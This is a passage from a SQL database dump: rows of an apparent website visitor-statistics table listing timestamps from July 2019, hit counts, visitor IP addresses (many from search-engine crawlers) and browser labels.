8','chrome'),(432621,1562067037,1,1,0,0,'13.66.139.0','other'),(432622,1562067208,1,1,0,0,'91.124.182.170','firefox'),(432623,1562067988,1,1,0,0,'178.154.244.11','other'),(432624,1562067989,1,1,0,0,'157.55.39.107','other'),(432625,1562068227,1,1,0,0,'157.55.39.155','other'),(432626,1562070387,2,2,0,0,'91.196.178.169','other'),(432627,1562071913,1,1,0,0,'5.45.207.19','other'),(432628,1562072050,1,1,0,0,'91.196.177.46','firefox'),(432629,1562072068,1,1,0,0,'207.46.13.105','other'),(432630,1562072125,1,1,0,0,'5.45.207.79','other'),(432631,1562072302,1,1,0,0,'157.55.39.155','other'),(432632,1562072816,1,1,0,0,'8.29.198.25','other'),(432633,1562072876,1,1,0,0,'8.29.198.27','other'),(432634,1562073177,1,1,0,0,'46.211.48.52','chrome'),(432635,1562073974,1,1,0,0,'91.196.178.77','chrome'),(432636,1562074210,1,1,0,0,'65.132.59.34','other'),(432637,1562075949,1,1,0,0,'46.211.103.14','chrome'),(432638,1562076190,1,1,0,0,'157.55.39.155','other'),(432639,1562077546,1,1,0,0,'95.67.75.146','chrome'),(432640,1562079354,1,1,0,0,'157.55.39.61','other'),(432641,1562080193,1,1,0,0,'157.55.39.62','other'),(432642,1562080977,1,1,0,0,'35.241.202.89','other'),(432643,1562081547,1,1,0,0,'213.180.203.9','other'),(432644,1562081722,1,1,0,0,'141.8.142.103','other'),(432645,1562081749,2,2,0,0,'40.77.167.21','other'),(432646,1562082144,1,1,0,0,'157.55.39.208','other'),(432647,1562083700,1,1,0,0,'8.29.198.27','other'),(432648,1562083738,1,1,0,0,'8.29.198.25','other'),(432649,1562086691,1,1,0,0,'157.55.39.208','other'),(432650,1562086830,1,1,0,0,'40.77.167.114','other'),(432651,1562087040,2,2,0,0,'40.77.167.21','other'),(432652,1562088260,1,1,0,0,'40.77.167.21','other'),(432653,1562088906,1,1,0,0,'157.55.39.208','other'),(432654,1562089556,1,1,0,0,'46.211.73.205','chrome'),(432655,1562093168,1,1,0,0,'157.55.39.175','other'),(432656,1562093647,1,1,0,0,'157.55.39.208','other'),(432657,1562094507,4,4,0,0,'157.55.39.175','other'),(432658,1562094582,2,2,0,0,'8.29.198.25','other'),(432659,1562095452,3,3,0,0,'40.77.167.84','other'),(432660,1562096116,1,1,0,0,'157.55.39.208','other'),(432661,1562097758,1,1,0,0,'94.242.54.22','chrome'),(432662,1562097800,1,1,0,0,'34.212.176.253','chrome'),(432663,1562098556,2,2,0,0,'213.180.203.48','other'),(432664,1562098975,1,1,0,0,'157.55.39.175','other'),(432665,1562099090,1,1,0,0,'37.9.113.148','other'),(432666,1562099178,1,1,0,0,'178.154.171.27','other'),(432667,1562100185,1,1,0,0,'157.55.39.231','other'),(432668,1562101437,1,1,0,0,'51.68.152.26','chrome'),(432669,1562102037,1,1,0,0,'141.8.142.103','other'),(432670,1562102330,1,1,0,0,'128.69.144.156','msie'),(432671,1562102682,1,1,0,0,'157.55.39.231','other'),(432672,1562105476,1,1,0,0,'8.29.198.25','other'),(432673,1562105491,1,1,0,0,'8.29.198.26','other'),(432674,1562108181,2,2,0,0,'157.55.39.231','other'),(432675,1562110283,1,1,0,0,'5.45.207.19','other'),(432676,1562111467,1,1,0,0,'157.55.39.231','other'),(432677,1562112935,1,1,0,0,'66.249.79.164','chrome'),(432678,1562113825,2,2,0,0,'157.55.39.172','other'),(432679,1562113962,1,1,0,0,'157.55.39.231','other'),(432680,1562114818,1,1,0,0,'157.55.39.172','other'),(432681,1562116358,1,1,0,0,'8.29.198.25','other'),(432682,1562116366,1,1,0,0,'8.29.198.26','other'),(432683,1562116518,1,1,0,0,'5.45.207.79','other'),(432684,1562118817,1,1,0,0,'207.46.13.1','other'),(432685,1562118851,1,1,0,0,'157.55.39.231','other'),(432686,1562118900,1,1,0,0,'40.77.167.23','other'),(432687,1562119243,1,1,0,0,'180.76.15.29','other'),(432688,1562119694,1,1,0,0,'157.55.39.172','other'),(432689,1562120280,1,1,0,0,'5.45.207.79','other'),(432690,1562120639,1,1,0,0,'13.66.139.0','other'),(432691,1562121871,1,1,0,0,'157.55.39.172','other'),(432692,1562121918,1,1,0,0,'5.45.207.19','other'),(432693,1562122339,1,1,0,0,'5.45.207.79','other'),(432694,1562122817,1,1,0,0,'157.55.39.231','other'),(432695,1562123325,1,1,0,0,'207.46.13.1','other'),(432696,1562123971,1,1,0,0,'40.77.167.23','other'),(432697,1562126932,1,1,0,0,'37.9.113.103','other'),(432698,1562126953,1,1,0,0,'209.17.96.242','other'),(432699,1562127217,1,1,0,0,'8.29.198.27','other'),(432700,1562127221,1,1,0,0,'8.29.198.26','other'),(432701,1562127452,3,3,0,0,'207.46.13.140','other'),(432702,1562129417,134,134,0,0,'178.63.26.114','other'),(432703,1562129839,1,1,0,0,'87.250.224.47','other'),(432704,1562130348,2,2,0,0,'207.46.13.1','other'),(432705,1562130362,1,1,0,0,'128.124.248.62','other'),(432706,1562131376,1,1,0,0,'207.46.13.1','other'),(432707,1562131507,1,1,0,0,'207.46.13.16','other'),(432708,1562132308,1,1,0,0,'109.70.100.28','other'),(432709,1562132463,1,1,0,0,'87.250.224.65','other'),(432710,1562132523,1,1,0,0,'207.46.13.140','other'),(432711,1562133402,1,1,0,0,'91.196.178.77','chrome'),(432712,1562133457,1,1,0,0,'5.45.207.8','other'),(432713,1562133704,1,1,0,0,'40.77.167.23','other'),(432714,1562133712,1,1,0,0,'91.196.178.131','firefox'),(432715,1562134495,1,1,0,0,'91.196.178.185','chrome'),(432716,1562134862,1,1,0,0,'37.9.113.148','other'),(432717,1562136342,1,1,0,0,'37.9.113.103','other'),(432718,1562138067,1,1,0,0,'8.29.198.25','other'),(432719,1562138089,1,1,0,0,'8.29.198.27','other'),(432721,1562139230,1,1,0,0,'91.196.178.77','chrome'),(432722,1562140040,2,2,0,0,'207.46.13.16','other'),(432723,1562140167,1,1,0,0,'83.170.240.174','chrome'),(432724,1562140240,1,1,0,0,'91.124.182.170','firefox'),(432725,1562141339,1,0,1,0,'66.249.79.161',''),(432726,1562141816,1,1,0,0,'91.196.178.77','chrome'),(432727,1562141993,2,2,0,0,'207.46.13.140','other'),(432728,1562142872,1,1,0,0,'40.77.167.58','other'),(432729,1562143635,1,1,0,0,'5.45.207.19','other'),(432730,1562143760,1,1,0,0,'91.124.182.170','firefox'),(432731,1562145230,1,1,0,0,'46.219.2.48','chrome'),(432732,1562145666,2,2,0,0,'40.77.167.58','other'),(432733,1562145871,1,1,0,0,'178.251.107.35','chrome'),(432734,1562146358,1,1,0,0,'91.196.178.77','chrome'),(432735,1562146502,1,1,0,0,'91.196.178.163','chrome'),(432736,1562146685,1,1,0,0,'46.219.2.48','chrome'),(432737,1562146687,1,1,0,0,'91.196.178.166','chrome'),(432738,1562147914,2,2,0,0,'40.77.167.58','other'),(432739,1562148027,1,1,0,0,'178.154.244.11','other'),(432740,1562148384,1,1,0,0,'180.76.15.5','other'),(432741,1562148601,1,1,0,0,'91.236.184.19','chrome'),(432742,1562148917,1,1,0,0,'109.74.154.72','chrome'),(432743,1562148937,2,2,0,0,'8.29.198.26','other'),(432744,1562149595,1,1,0,0,'40.77.167.207','other'),(432745,1562149788,1,1,0,0,'141.8.142.108','other'),(432746,1562149996,1,1,0,0,'66.249.79.161','chrome'),(432747,1562150106,1,1,0,0,'91.236.184.19','chrome'),(432748,1562150323,2,2,0,0,'95.213.141.126','opera'),(432749,1562150541,1,1,0,0,'40.77.167.58','other'),(432750,1562150587,1,1,0,0,'66.249.79.164','chrome'),(432751,1562150867,1,1,0,0,'195.88.158.179','chrome'),(432752,1562151067,1,1,0,0,'91.196.178.185','chrome'),(432753,1562151508,1,1,0,0,'5.45.207.19','other'),(432754,1562151834,1,1,0,0,'40.77.167.169','other'),(432755,1562152092,1,1,0,0,'213.87.146.206','other'),(432756,1562152210,3,3,0,0,'34.68.118.109','chrome'),(432757,1562152254,3,3,0,0,'35.222.159.212','chrome'),(432758,1562152268,3,3,0,0,'35.188.59.44','chrome'),(432759,1562152284,5,5,0,0,'35.226.122.239','chrome'),(432760,1562152316,3,3,0,0,'34.68.30.106','chrome'),(432761,1562152894,1,1,0,0,'40.77.167.58','other'),(432762,1562153377,1,1,0,0,'207.46.13.240','other'),(432763,1562154007,1,1,0,0,'91.124.182.170','firefox'),(432764,1562154079,1,1,0,0,'46.211.97.22','firefox'),(432765,1562154366,1,1,0,0,'91.196.178.92','firefox'),(432766,1562155420,1,1,0,0,'91.196.178.77','chrome'),(432767,1562156225,1,1,0,0,'40.77.167.58','other'),(432768,1562157895,1,1,0,0,'91.196.178.77','chrome'),(432769,1562158495,1,1,0,0,'178.154.244.11','other'),(432770,1562158863,1,1,0,0,'213.180.203.40','other'),(432771,1562159767,1,1,0,0,'91.196.178.82','chrome'),(432772,1562159847,1,1,0,0,'8.29.198.27','other'),(432773,1562159859,1,1,0,0,'8.29.198.25','other'),(432774,1562159936,1,1,0,0,'178.95.67.135','chrome'),(432775,1562159954,1,1,0,0,'91.196.178.77','chrome'),(432776,1562160873,1,1,0,0,'91.196.178.87','chrome'),(432777,1562161378,1,1,0,0,'207.46.13.140','other'),(432778,1562161734,2,2,0,0,'91.196.177.17','chrome'),(432779,1562162471,1,1,0,0,'95.28.88.131','msie'),(432780,1562163023,1,1,0,0,'91.209.11.236','other'),(432781,1562163029,2,2,0,0,'40.77.167.169','other'),(432782,1562164442,1,1,0,0,'5.45.207.79','other'),(432783,1562164500,2,2,0,0,'157.55.39.51','other'),(432784,1562165359,2,2,0,0,'178.154.244.11','other'),(432785,1562165408,1,1,0,0,'157.55.39.51','other'),(432786,1562165910,1,1,0,0,'40.84.140.119','chrome'),(432787,1562166326,1,1,0,0,'157.55.39.88','other'),(432788,1562168450,1,1,0,0,'141.8.183.11','other'),(432789,1562168660,1,1,0,0,'157.55.39.88','other'),(432790,1562170720,1,1,0,0,'8.29.198.26','other'),(432791,1562170745,1,1,0,0,'8.29.198.25','other'),(432792,1562171086,1,1,0,0,'94.178.7.202','chrome'),(432793,1562171299,1,1,0,0,'89.249.64.186','firefox'),(432794,1562171803,1,1,0,0,'87.250.224.99','other'),(432795,1562171822,3,3,0,0,'207.46.13.117','other'),(432796,1562172224,1,1,0,0,'91.196.178.189','chrome'),(432797,1562172387,1,1,0,0,'5.228.50.77','msie'),(432798,1562172604,1,1,0,0,'167.71.186.70','other'),(432799,1562172825,1,1,0,0,'207.46.13.117','other'),(432800,1562173280,1,1,0,0,'157.55.39.109','other'),(432801,1562173388,1,1,0,0,'104.250.177.194','chrome'),(432802,1562174433,1,1,0,0,'207.46.13.5','other'),(432803,1562174443,1,1,0,0,'167.71.178.247','other'),(432804,1562176319,1,1,0,0,'207.46.13.5','other'),(432805,1562176699,1,1,0,0,'40.77.167.122','other'),(432806,1562177409,1,1,0,0,'91.196.178.76','firefox'),(432807,1562177813,1,1,0,0,'87.250.224.47','other'),(432808,1562177974,1,1,0,0,'91.196.178.54','chrome'),(432809,1562178451,1,1,0,0,'178.154.244.11','other'),(432810,1562178884,1,1,0,0,'91.196.178.54','chrome'),(432811,1562179019,1,1,0,0,'95.132.61.89','other'),(432812,1562180673,1,1,0,0,'207.46.13.50','other'),(432813,1562180728,1,1,0,0,'40.77.167.208','other'),(432814,1562181597,1,1,0,0,'8.29.198.25','other'),(432815,1562181634,1,1,0,0,'8.29.198.26','other'),(432816,1562181657,1,1,0,0,'95.134.171.121','chrome'),(432817,1562182755,1,1,0,0,'207.46.13.50','other'),(432818,1562182873,1,1,0,0,'178.154.244.11','other'),(432819,1562182881,1,1,0,0,'141.8.142.103','other'),(432820,1562183202,1,1,0,0,'93.79.35.15','chrome'),(432821,1562184075,1,1,0,0,'5.45.207.79','other'),(432822,1562186421,1,1,0,0,'207.46.13.72','other'),(432823,1562187678,1,1,0,0,'84.173.252.123','firefox'),(432824,1562187781,1,1,0,0,'207.46.13.50','other'),(432825,1562187792,1,1,0,0,'37.52.22.93','chrome'),(432826,1562187817,1,1,0,0,'141.8.142.103','other'),(432827,1562187861,1,1,0,0,'5.45.207.19','other'),(432828,1562187864,2,2,0,0,'5.45.207.79','other'),(432829,1562188477,2,2,0,0,'207.46.13.72','other'),(432830,1562188879,1,1,0,0,'207.46.13.50','other'),(432831,1562189146,1,1,0,0,'180.76.15.163','other'),(432832,1562189435,1,1,0,0,'207.46.13.72','other'),(432833,1562191146,1,1,0,0,'180.76.15.148','other'),(432834,1562192445,2,2,0,0,'8.29.198.26','other'),(432835,1562192446,1,1,0,0,'66.249.66.220','chrome'),(432836,1562192846,1,1,0,0,'157.55.39.80','other'),(432837,1562193381,2,2,0,0,'157.55.39.78','other'),(432838,1562194307,2,2,0,0,'207.46.13.180','other'),(432839,1562195050,2,2,0,0,'157.55.39.80','other'),(432840,1562196360,1,1,0,0,'157.55.39.76','other'),(432841,1562196475,1,1,0,0,'207.46.13.180','other'),(432842,1562196710,1,1,0,0,'157.55.39.78','other'),(432843,1562197150,1,1,0,0,'157.55.39.80','other'),(432844,1562197540,1,1,0,0,'66.249.66.222','chrome'),(432845,1562200944,1,1,0,0,'157.55.39.87','other'),(432846,1562202388,1,1,0,0,'157.55.39.87','other'),(432847,1562203313,1,1,0,0,'8.29.198.27','other'),(432848,1562203404,1,1,0,0,'8.29.198.26','other'),(432849,1562203564,1,1,0,0,'157.55.39.76','other'),(432850,1562204007,1,1,0,0,'40.77.167.158','other'),(432851,1562205494,1,1,0,0,'95.163.255.162','other'),(432852,1562205829,1,1,0,0,'13.66.139.0','other'),(432853,1562206026,1,1,0,0,'5.45.207.19','other'),(432854,1562206773,1,1,0,0,'66.249.66.220','chrome'),(432855,1562206813,1,1,0,0,'66.249.66.130','chrome'),(432856,1562207115,1,1,0,0,'40.77.167.158','other'),(432857,1562207222,1,1,0,0,'157.55.39.76','other'),(432858,1562207941,1,1,0,0,'141.8.142.103','other'),(432859,1562208141,1,1,0,0,'46.211.126.223','chrome'),(432860,1562208502,1,1,0,0,'141.8.142.108','other'),(432861,1562209272,1,1,0,0,'157.55.39.120','other'),(432862,1562209796,1,1,0,0,'5.45.207.19','other'),(432863,1562210707,2,2,0,0,'157.55.39.120','other'),(432864,1562210984,1,1,0,0,'40.77.167.158','other'),(432865,1562212104,1,1,0,0,'95.163.255.169','other'),(432866,1562214170,1,1,0,0,'8.29.198.26','other'),(432867,1562214215,1,1,0,0,'157.55.39.116','other'),(432868,1562214269,1,1,0,0,'8.29.198.27','other'),(432869,1562215430,1,1,0,0,'40.77.167.158','other'),(432870,1562215639,1,1,0,0,'157.55.39.116','other'),(432871,1562216766,1,1,0,0,'91.196.178.179','chrome'),(432872,1562217342,1,1,0,0,'207.46.13.148','other'),(432873,1562217704,1,1,0,0,'91.196.178.82','firefox'),(432874,1562218194,1,1,0,0,'91.196.177.46','firefox'),(432875,1562218600,1,1,0,0,'91.196.178.131','chrome'),(432876,1562219681,1,1,0,0,'40.77.167.158','other'),(432877,1562219728,1,1,0,0,'178.154.244.11','other'),(432878,1562222070,1,1,0,0,'157.55.39.59','other'),(432879,1562222214,1,1,0,0,'66.249.66.220','chrome'),(432880,1562222373,2,2,0,0,'91.196.178.79','chrome'),(432881,1562222615,1,1,0,0,'195.234.7.43','chrome'),(432882,1562222755,1,1,0,0,'157.55.39.116','other'),(432883,1562223504,1,1,0,0,'5.45.207.19','other'),(432884,1562223554,1,1,0,0,'5.45.207.79','other'),(432885,1562224342,1,1,0,0,'66.249.66.218','chrome'),(432886,1562224513,3,3,0,0,'157.55.39.59','other'),(432887,1562224769,1,1,0,0,'66.249.66.132','chrome'),(432888,1562224773,1,0,1,0,'66.249.66.130',''),(432889,1562224964,3,3,0,0,'157.55.39.116','other'),(432890,1562224968,2,2,0,0,'207.46.13.148','other'),(432891,1562224973,3,3,0,0,'157.55.39.246','other'),(432892,1562225023,1,1,0,0,'8.29.198.26','other'),(432893,1562225148,1,1,0,0,'8.29.198.25','other'),(432894,1562226000,3,3,0,0,'46.201.182.27','chrome'),(432895,1562226192,1,1,0,0,'91.196.178.77','chrome'),(432896,1562226254,1,1,0,0,'46.201.182.27','msie'),(432897,1562226468,1,1,0,0,'66.249.66.222','chrome'),(432898,1562227376,1,1,0,0,'66.249.66.222','chrome'),(432899,1562227470,1,1,0,0,'91.196.177.46','firefox'),(432900,1562227476,1,1,0,0,'91.196.178.77','chrome'),(432901,1562228293,2,2,0,0,'157.55.39.246','other'),(432902,1562228997,2,2,0,0,'178.154.244.11','other'),(432903,1562229630,1,1,0,0,'142.44.142.136','firefox'),(432904,1562229702,1,1,0,0,'95.163.255.153','other'),(432905,1562230089,1,1,0,0,'95.163.255.160','other'),(432906,1562230298,1,1,0,0,'66.249.66.128','chrome'),(432907,1562230705,1,1,0,0,'91.196.178.77','chrome'),(432908,1562230909,1,1,0,0,'95.132.6.4','chrome'),(432909,1562230941,1,1,0,0,'207.46.13.40','other'),(432910,1562231172,1,1,0,0,'66.249.66.218','chrome'),(432911,1562231178,1,1,0,0,'157.55.39.246','other'),(432912,1562231986,1,1,0,0,'5.45.207.79','other'),(432913,1562232339,1,1,0,0,'95.132.6.4','chrome'),(432914,1562232362,1,1,0,0,'157.55.39.233','other'),(432915,1562232562,1,1,0,0,'207.46.13.40','other'),(432916,1562233000,1,1,0,0,'5.45.207.79','other'),(432917,1562233249,1,1,0,0,'157.55.39.246','other'),(432918,1562234273,1,1,0,0,'207.46.13.40','other'),(432919,1562234339,1,1,0,0,'157.55.39.233','other'),(432920,1562234756,1,1,0,0,'37.204.206.150','msie'),(432921,1562234859,1,1,0,0,'157.55.39.246','other'),(432922,1562235251,2,2,0,0,'207.46.13.40','other'),(432923,1562235420,1,1,0,0,'91.196.178.162','chrome'),(432924,1562235497,1,1,0,0,'207.46.13.22','other'),(432925,1562235857,1,1,0,0,'109.74.154.72','chrome'),(432926,1562235900,1,1,0,0,'8.29.198.27','other'),(432927,1562236006,1,1,0,0,'8.29.198.26','other'),(432928,1562236009,1,1,0,0,'157.55.39.246','other'),(432929,1562236475,1,1,0,0,'157.55.39.233','other'),(432930,1562236600,3,3,0,0,'207.46.13.40','other'),(432931,1562236966,1,1,0,0,'157.55.39.246','other'),(432932,1562237908,2,2,0,0,'207.46.13.22','other'),(432933,1562238274,1,1,0,0,'157.55.39.233','other'),(432934,1562238285,1,1,0,0,'207.46.13.40','other'),(432935,1562238377,2,2,0,0,'157.55.39.246','other'),(432936,1562238697,1,1,0,0,'94.125.126.133','firefox'),(432937,1562239062,2,2,0,0,'207.46.13.22','other'),(432938,1562239442,1,1,0,0,'91.196.178.77','chrome'),(432939,1562239459,3,3,0,0,'207.46.13.40','other'),(432940,1562239485,1,1,0,0,'46.211.110.154','chrome'),(432941,1562239556,1,1,0,0,'157.55.39.246','other'),(432942,1562240262,1,1,0,0,'91.196.178.82','chrome'),(432943,1562240743,1,1,0,0,'207.46.13.22','other'),(432944,1562240745,1,1,0,0,'157.55.39.246','other'),(432945,1562240848,3,3,0,0,'207.46.13.40','other'),(432946,1562241024,2,2,0,0,'157.55.39.233','other'),(432947,1562241165,1,1,0,0,'91.196.178.82','chrome'),(432948,1562241181,1,1,0,0,'178.154.244.11','other'),(432949,1562241603,2,2,0,0,'207.46.13.45','other'),(432950,1562242017,2,2,0,0,'207.46.13.22','other'),(432951,1562242168,2,2,0,0,'207.46.13.40','other'),(432952,1562242905,1,1,0,0,'157.55.39.233','other'),(432953,1562243229,1,1,0,0,'207.46.13.45','other'),(432954,1562243374,2,2,0,0,'198.16.66.139','chrome'),(432955,1562244103,2,2,0,0,'157.55.39.233','other'),(432956,1562244239,1,1,0,0,'5.45.207.79','other'),(432957,1562244355,1,1,0,0,'167.71.186.212','other'),(432958,1562245377,1,1,0,0,'207.46.13.45','other'),(432959,1562245393,2,2,0,0,'91.196.178.77','chrome'),(432960,1562245894,1,1,0,0,'157.55.39.233','other'),(432961,1562245897,1,1,0,0,'178.154.244.11','other'),(432962,1562246035,2,2,0,0,'207.46.13.22','other'),(432963,1562246100,4,4,0,0,'207.46.13.40','other'),(432964,1562246294,1,1,0,0,'91.196.178.99','chrome'),(432965,1562246768,1,1,0,0,'8.29.198.26','other'),(432966,1562246890,1,1,0,0,'8.29.198.25','other'),(432967,1562248017,1,1,0,0,'207.46.13.40','other'),(432968,1562248086,5,5,0,0,'157.55.39.233','other'),(432969,1562248743,1,1,0,0,'95.134.221.86','chrome'),(432970,1562248904,1,1,0,0,'207.46.13.22','other'),(432971,1562248975,1,1,0,0,'87.250.224.47','other'),(432972,1562249019,2,2,0,0,'207.46.13.40','other'),(432973,1562249948,2,2,0,0,'207.46.13.40','other'),(432974,1562250018,2,2,0,0,'157.55.39.233','other'),(432975,1562250134,1,1,0,0,'167.71.184.122','other'),(432976,1562250984,2,2,0,0,'207.46.13.45','other'),(432977,1562251041,2,2,0,0,'157.55.39.233','other'),(432978,1562251239,1,1,0,0,'193.111.199.130','chrome'),(432979,1562251633,1,1,0,0,'207.46.13.22','other'),(432980,1562253057,1,1,0,0,'128.124.29.37','chrome'),(432981,1562253062,1,1,0,0,'207.46.13.45','other'),(432982,1562253574,1,1,0,0,'91.196.177.42','chrome'),(432983,1562253710,1,1,0,0,'213.180.203.9','other'),(432984,1562253742,2,2,0,0,'157.55.39.212','other'),(432985,1562254003,2,2,0,0,'157.55.39.209','other'),(432986,1562254740,1,1,0,0,'207.46.13.45','other'),(432987,1562255400,2,2,0,0,'207.46.13.134','other'),(432988,1562255448,2,2,0,0,'207.46.13.135','other'),(432989,1562255823,1,1,0,0,'207.46.13.129','other'),(432990,1562255992,1,1,0,0,'40.77.167.132','other'),(432991,1562256060,6,6,0,0,'148.251.41.239','other'),(432992,1562256721,2,2,0,0,'207.46.13.134','other'),(432993,1562257023,3,3,0,0,'40.77.167.146','other'),(432994,1562257618,1,1,0,0,'8.29.198.26','other'),(432995,1562257747,1,1,0,0,'8.29.198.27','other'),(432996,1562257820,3,3,0,0,'207.46.13.94','other'),(432997,1562258931,3,3,0,0,'207.46.13.94','other'),(432998,1562259983,1,1,0,0,'141.8.142.103','other'),(432999,1562260217,2,2,0,0,'40.77.167.179','other'),(433000,1562260653,1,1,0,0,'207.46.13.185','other'),(433001,1562260839,1,1,0,0,'94.178.224.165','firefox'),(433002,1562261094,1,1,0,0,'207.46.13.134','other'),(433003,1562261175,2,2,0,0,'157.55.39.8','other'),(433004,1562261456,2,2,0,0,'207.46.13.73','other'),(433005,1562261641,1,1,0,0,'157.55.39.233','other'),(433006,1562261978,1,1,0,0,'207.46.13.203','other'),(433007,1562262397,1,1,0,0,'207.46.13.134','other'),(433008,1562263077,2,2,0,0,'40.77.167.136','other'),(433009,1562263158,1,1,0,0,'180.76.15.11','other'),(433010,1562263183,3,3,0,0,'40.77.167.56','other'),(433011,1562263232,1,1,0,0,'95.163.255.98','other'),(433012,1562263283,1,1,0,0,'40.77.167.190','other'),(433013,1562263430,2,2,0,0,'157.55.39.71','other'),(433014,1562263557,1,1,0,0,'66.249.66.220','chrome'),(433015,1562263981,1,1,0,0,'40.77.167.178','other'),(433016,1562264005,1,1,0,0,'40.77.167.60','other'),(433017,1562264181,1,1,0,0,'188.163.5.4','chrome'),(433018,1562264415,1,1,0,0,'66.249.66.222','chrome'),(433019,1562264563,4,4,0,0,'40.77.167.135','other'),(433020,1562264571,1,1,0,0,'207.46.13.180','other'),(433021,1562265681,1,1,0,0,'40.77.167.178','other'),(433022,1562265784,2,2,0,0,'207.46.13.23','other'),(433023,1562266314,1,1,0,0,'207.46.13.180','other'),(433024,1562266764,1,1,0,0,'207.46.13.65','other'),(433025,1562267298,3,3,0,0,'207.46.13.50','other'),(433026,1562267361,1,1,0,0,'40.77.167.178','other'),(433027,1562267403,3,3,0,0,'207.46.13.180','other'),(433028,1562267543,1,1,0,0,'66.249.66.222','chrome'),(433029,1562267665,2,2,0,0,'207.46.13.174','other'),(433030,1562268403,1,1,0,0,'207.46.13.11','other'),(433031,1562268463,1,1,0,0,'8.29.198.25','other'),(433032,1562268602,1,1,0,0,'8.29.198.27','other'),(433033,1562268974,1,1,0,0,'207.46.13.88','other'),(433034,1562269086,2,2,0,0,'157.55.39.48','other'),(433035,1562269341,1,1,0,0,'207.46.13.96','other'),(433036,1562270653,2,2,0,0,'207.46.13.88','other'),(433037,1562270796,2,2,0,0,'207.46.13.105','other'),(433038,1562270900,1,1,0,0,'157.55.39.110','other'),(433039,1562271046,1,1,0,0,'157.55.39.231','other'),(433040,1562271081,1,1,0,0,'178.154.244.11','other'),(433041,1562271650,1,1,0,0,'66.249.66.220','chrome'),(433042,1562272017,1,1,0,0,'157.55.39.141','other'),(433043,1562272226,2,2,0,0,'207.46.13.170','other'),(433044,1562272966,2,2,0,0,'207.46.13.105','other'),(433045,1562273157,1,1,0,0,'66.249.66.222','chrome'),(433046,1562273355,1,1,0,0,'54.242.239.42','chrome'),(433047,1562273578,3,3,0,0,'157.55.39.143','other'),(433048,1562274160,1,1,0,0,'157.55.39.182','other'),(433049,1562275055,1,1,0,0,'141.8.142.103','other'),(433050,1562275259,1,1,0,0,'163.172.76.63','other'),(433051,1562275310,4,4,0,0,'157.55.39.81','other'),(433052,1562275488,2,2,0,0,'157.55.39.182','other'),(433053,1562276551,1,1,0,0,'157.55.39.81','other'),(433054,1562276660,3,3,0,0,'207.46.13.170','other'),(433055,1562276974,2,2,0,0,'157.55.39.202','other'),(433056,1562277634,1,1,0,0,'207.46.13.110','other'),(433057,1562278134,3,3,0,0,'157.55.39.200','other'),(433058,1562278489,1,1,0,0,'157.55.39.202','other'),(433059,1562278492,3,3,0,0,'207.46.13.170','other'),(433060,1562279232,2,2,0,0,'40.77.167.15','other'),(433061,1562279310,1,1,0,0,'8.29.198.26','other'),(433062,1562279475,1,1,0,0,'8.29.198.25','other'),(433063,1562279499,1,1,0,0,'95.163.255.98','other'),(433064,1562279543,2,2,0,0,'157.55.39.202','other'),(433065,1562279965,1,1,0,0,'95.163.255.153','other'),(433066,1562280181,1,1,0,0,'157.55.39.148','other'),(433067,1562280847,1,1,0,0,'40.77.167.15','other'),(433068,1562280906,1,1,0,0,'207.46.13.170','other'),(433069,1562281742,1,1,0,0,'157.55.39.202','other'),(433070,1562281942,1,1,0,0,'157.55.39.148','other'),(433071,1562281946,2,2,0,0,'157.55.39.233','other'),(433072,1562282241,1,1,0,0,'66.249.66.218','chrome'),(433073,1562282556,1,1,0,0,'23.103.64.39','other'),(433074,1562282814,1,1,0,0,'91.209.11.236','other'),(433075,1562282862,1,1,0,0,'157.55.39.202','other'),(433076,1562283154,2,2,0,0,'207.46.13.170','other'),(433077,1562283367,2,2,0,0,'148.251.49.112','other'),(433078,1562283640,1,1,0,0,'66.249.66.220','chrome'),(433079,1562284473,2,2,0,0,'40.77.167.15','other'),(433080,1562284696,2,2,0,0,'40.77.167.37','other'),(433081,1562285298,1,1,0,0,'178.154.244.11','other'),(433082,1562285452,2,2,0,0,'157.55.39.233','other'),(433083,1562286160,1,1,0,0,'40.77.167.37','other'),(433084,1562286961,1,1,0,0,'40.77.167.15','other'),(433085,1562287294,11,11,0,0,'162.208.51.43','firefox'),(433086,1562287402,2,2,0,0,'157.55.39.243','other'),(433087,1562287753,2,2,0,0,'157.55.39.233','other'),(433088,1562288170,2,2,0,0,'40.77.167.15','other'),(433089,1562288332,1,1,0,0,'157.55.39.202','other'),(433090,1562288961,2,2,0,0,'40.77.167.55','other'),(433091,1562289150,2,2,0,0,'66.249.66.220','chrome'),(433092,1562289241,2,2,0,0,'40.77.167.37','other'),(433093,1562289919,1,1,0,0,'34.220.216.21','other'),(433094,1562290148,2,2,0,0,'8.29.198.26','other'),(433095,1562290442,2,2,0,0,'157.55.39.172','other'),(433096,1562290613,3,3,0,0,'157.55.39.243','other'),(433097,1562290934,1,1,0,0,'40.77.167.55','other'),(433098,1562291539,1,1,0,0,'40.77.167.37','other'),(433099,1562291912,2,2,0,0,'157.55.39.243','other'),(433100,1562292173,1,1,0,0,'157.55.39.172','other'),(433101,1562292233,1,1,0,0,'40.77.167.55','other'),(433102,1562293303,1,1,0,0,'40.77.167.37','other'),(433103,1562293361,1,1,0,0,'40.77.167.55','other'),(433104,1562293563,4,4,0,0,'157.55.39.172','other'),(433105,1562294025,1,1,0,0,'34.77.95.105','other'),(433106,1562294066,2,2,0,0,'157.55.39.243','other'),(433107,1562294245,2,2,0,0,'66.249.66.220','chrome'),(433108,1562294621,1,1,0,0,'157.55.39.172','other'),(433109,1562295794,2,2,0,0,'40.77.167.55','other'),(433110,1562296148,2,2,0,0,'157.55.39.243','other'),(433111,1562296207,2,2,0,0,'66.249.66.222','chrome'),(433112,1562296395,1,1,0,0,'66.249.66.218','chrome'),(433113,1562296423,1,1,0,0,'5.45.207.79','other'),(433114,1562296976,4,4,0,0,'40.77.167.37','other'),(433115,1562297193,1,1,0,0,'66.249.66.128','chrome'),(433116,1562298110,1,1,0,0,'66.249.66.132','chrome'),(433117,1562298138,3,3,0,0,'157.55.39.172','other'),(433118,1562298174,1,1,0,0,'40.77.167.37','other'),(433119,1562298417,1,1,0,0,'66.249.66.222','chrome'),(433120,1562298526,2,2,0,0,'157.55.39.243','other'),(433121,1562298540,1,1,0,0,'66.249.66.218','chrome'),(433122,1562298585,2,2,0,0,'66.249.66.220','chrome'),(433123,1562298853,1,1,0,0,'40.77.167.55','other'),(433124,1562299169,2,2,0,0,'178.154.244.11','other'),(433125,1562299786,1,1,0,0,'40.77.167.55','other'),(433126,1562300356,2,2,0,0,'66.249.66.220','chrome'),(433127,1562300788,1,1,0,0,'40.77.167.37','other'),(433128,1562300987,1,1,0,0,'8.29.198.25','other'),(433129,1562301199,1,1,0,0,'8.29.198.26','other'),(433130,1562301329,2,2,0,0,